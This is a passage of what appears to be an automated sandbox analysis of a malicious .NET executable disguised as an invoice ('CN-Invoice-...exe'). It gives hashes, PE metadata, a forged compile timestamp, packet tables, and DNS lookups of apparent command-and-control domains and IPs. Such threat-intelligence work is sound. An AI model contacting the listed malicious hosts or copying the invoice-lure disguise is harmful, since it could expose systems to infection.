                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                            File name:CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                            File size:206848
                                                                                                                                                            MD5:a656f522f604872e02daee9dbc458d9c
                                                                                                                                                            SHA1:e463d219a1d4dbde375e4f53c2fc250d6ee9d7f1
                                                                                                                                                            SHA256:a0ebcb3078763eb8acca534831ef9ca1a213347328698aa3cda7c5bd23cd81d8
                                                                                                                                                            SHA512:6d13f052bc55d278b3d6a2b0ddd286572d9e45e96fbb8f52f64847b5c93b4e7c21edcbd2e42ccd096a660c86e1bafec84dd45c41195fa0c3533ae1bd1e82d9ca
                                                                                                                                                            SSDEEP:1536:OQEpTCImp9zO6/XSTwtPo55rKrFUcDOC53bzf01l:OQJta6/XQIFNMl
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..n............... ........@.. ..............................4.....@................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:68c6a6ce96b28acc

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

                                                                                                                                                            Entrypoint:0x408c1e
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:true
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                            Time Stamp:0x8AB4D40F [Tue Sep 29 02:29:35 2043 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                            Authenticode Signature

                                                                                                                                                            Signature Valid:
                                                                                                                                                            Signature Issuer:
                                                                                                                                                            Signature Validation Error:
                                                                                                                                                            Error Number:
                                                                                                                                                            Not Before, Not After
                                                                                                                                                              Subject Chain
                                                                                                                                                                Version:
                                                                                                                                                                Thumbprint MD5:
                                                                                                                                                                Thumbprint SHA-1:
                                                                                                                                                                Thumbprint SHA-256:
                                                                                                                                                                Serial:

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                Data Directories

                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8bc40x57.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x2b588.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x76000x18d0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000xc.reloc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                Sections

                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x20000x6c240x6e00False0.569140625data6.79874313495IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rsrc0xa0000x2b5880x2b600False0.209018146614data5.11613599297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .reloc0x360000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                Resources

                                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                                RT_ICON0xa2680x3751PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                RT_ICON0xd9bc0x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                                                                                                                RT_ICON0x1e1e40x94a8data
                                                                                                                                                                RT_ICON0x2768c0x5488data
                                                                                                                                                                RT_ICON0x2cb140x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 4286513152
                                                                                                                                                                RT_ICON0x30d3c0x25a8data
                                                                                                                                                                RT_ICON0x332e40x10a8data
                                                                                                                                                                RT_ICON0x3438c0x988data
                                                                                                                                                                RT_ICON0x34d140x468GLS_BINARY_LSB_FIRST
                                                                                                                                                                RT_GROUP_ICON0x3517c0x84data
                                                                                                                                                                RT_VERSION0x352000x388dataEnglishUnited States

                                                                                                                                                                Imports

                                                                                                                                                                DLLImport
                                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                                Version Infos

                                                                                                                                                                DescriptionData
                                                                                                                                                                LegalCopyrightCopyright 2022 KRJLJBgt. All rights reserved.
                                                                                                                                                                Assembly Version2.1.1.0
                                                                                                                                                                InternalNameWgjnHXED.exe
                                                                                                                                                                FileVersion6.1.7.5
                                                                                                                                                                CompanyNameUoiZpnTq
                                                                                                                                                                LegalTrademarksWOAkEmIy
                                                                                                                                                                CommentsHzWOHjaz
                                                                                                                                                                ProductNameWgjnHXED
                                                                                                                                                                ProductVersion2.1.1.0
                                                                                                                                                                FileDescriptionEsCOzVNx
                                                                                                                                                                OriginalFilenameWgjnHXED.exe
                                                                                                                                                                Translation0x0409 0x0514

                                                                                                                                                                Possible Origin

                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishUnited States

                                                                                                                                                                Network Behavior

                                                                                                                                                                Snort IDS Alerts

                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                02/22/21-07:46:08.953744ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Feb 22, 2021 07:45:11.793998003 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.842531919 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.846292019 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.848449945 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.895890951 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936095953 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936125040 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936142921 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936156034 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936171055 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936191082 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936222076 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936239958 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936244965 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.936253071 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936270952 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.936302900 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.936331987 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.937458038 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.937479019 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.937566042 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.938664913 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.938683987 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.938755035 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.939884901 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.939903975 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.939977884 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.941148996 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.941168070 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.941394091 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.942347050 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.942368031 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.942471027 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.943555117 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.943578005 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.943675041 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.944773912 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.944794893 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.944883108 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.946001053 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.946021080 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.946131945 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.947248936 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.947268009 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.947340965 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.948430061 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.948451042 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.949225903 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.983365059 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.983387947 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.983474970 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.984009027 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.984028101 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.984107018 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.985220909 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.985240936 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.985347033 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.986469030 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.986490011 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.986612082 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.987646103 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.987665892 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.987770081 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.988883972 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.989492893 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.989516020 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.989593983 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.990787029 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.990806103 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.990874052 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.991934061 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.991952896 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.992037058 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.993166924 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.993189096 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.993376017 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.994384050 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.994410992 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.994533062 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.995600939 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.995642900 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.995759010 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.996803999 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.996829987 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.996916056 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.998044968 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.998073101 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.998131990 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:11.999262094 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.999283075 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.999356031 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.000473022 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.000495911 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.000590086 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.001709938 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.001735926 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.001804113 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.002914906 CET8049715104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.003146887 CET4971580192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:12.003513098 CET8049715104.21.71.230192.168.2.5

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Feb 22, 2021 07:45:02.118830919 CET53537848.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:02.181114912 CET6530753192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:02.232723951 CET53653078.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:02.349119902 CET6434453192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:02.397936106 CET53643448.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:02.537466049 CET6206053192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:02.586035967 CET53620608.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:02.664633036 CET6180553192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:02.713480949 CET53618058.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:03.584505081 CET5479553192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:03.633208990 CET53547958.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:04.609817028 CET4955753192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:04.658499956 CET53495578.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:05.121041059 CET6173353192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:05.180919886 CET53617338.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:05.790483952 CET6544753192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:05.842108011 CET53654478.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:07.234590054 CET5244153192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:07.291798115 CET53524418.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:08.266211987 CET6217653192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:08.315078974 CET53621768.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:09.406626940 CET5959653192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:09.458101988 CET53595968.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:10.355716944 CET6529653192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:10.415628910 CET53652968.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.514427900 CET6318353192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:11.564491034 CET53631838.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:11.702461004 CET6015153192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:11.767849922 CET53601518.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:12.791641951 CET5696953192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:12.843056917 CET53569698.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:13.845206976 CET5516153192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:13.896873951 CET53551618.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:30.793107033 CET5475753192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:30.862266064 CET53547578.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:41.328336954 CET4999253192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:41.377043009 CET53499928.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:49.873044968 CET6007553192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:49.932672977 CET53600758.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:55.986865044 CET5501653192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:56.156891108 CET53550168.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:58.192152977 CET6434553192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:58.242141008 CET53643458.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.086158991 CET5712853192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:45:59.144161940 CET53571288.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:06.905451059 CET5479153192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:46:07.897929907 CET5479153192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:46:08.899308920 CET53547918.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:08.899494886 CET53547918.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:08.902038097 CET5479153192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:46:08.953583002 CET53547918.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:16.488347054 CET5046353192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:46:16.548158884 CET53504638.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:35.256659031 CET5039453192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:46:35.316206932 CET53503948.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:40.067873955 CET5853053192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:46:40.125920057 CET53585308.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:41.144453049 CET5381353192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:46:41.193178892 CET53538138.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:47:06.997857094 CET6373253192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:47:07.056972027 CET53637328.8.8.8192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:47:18.077564001 CET5734453192.168.2.58.8.8.8
                                                                                                                                                                Feb 22, 2021 07:47:18.126307011 CET53573448.8.8.8192.168.2.5

                                                                                                                                                                ICMP Packets

                                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                Feb 22, 2021 07:46:08.953743935 CET192.168.2.58.8.8.8d023(Port unreachable)Destination Unreachable

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                Feb 22, 2021 07:45:11.702461004 CET192.168.2.58.8.8.80x7b22Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                                                                                Feb 22, 2021 07:45:49.873044968 CET192.168.2.58.8.8.80xd165Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                                                                                Feb 22, 2021 07:45:55.986865044 CET192.168.2.58.8.8.80xda85Standard query (0)nanopc.linkpc.netA (IP address)IN (0x0001)
                                                                                                                                                                Feb 22, 2021 07:45:59.086158991 CET192.168.2.58.8.8.80x58bcStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                                                                                Feb 22, 2021 07:46:16.488347054 CET192.168.2.58.8.8.80x55a7Standard query (0)nanopc.linkpc.netA (IP address)IN (0x0001)
                                                                                                                                                                Feb 22, 2021 07:46:35.256659031 CET192.168.2.58.8.8.80x604Standard query (0)nanopc.linkpc.netA (IP address)IN (0x0001)

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                Feb 22, 2021 07:45:11.767849922 CET8.8.8.8192.168.2.50x7b22No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                                                                                Feb 22, 2021 07:45:11.767849922 CET8.8.8.8192.168.2.50x7b22No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                                                                                Feb 22, 2021 07:45:49.932672977 CET8.8.8.8192.168.2.50xd165No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                                                                                Feb 22, 2021 07:45:49.932672977 CET8.8.8.8192.168.2.50xd165No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
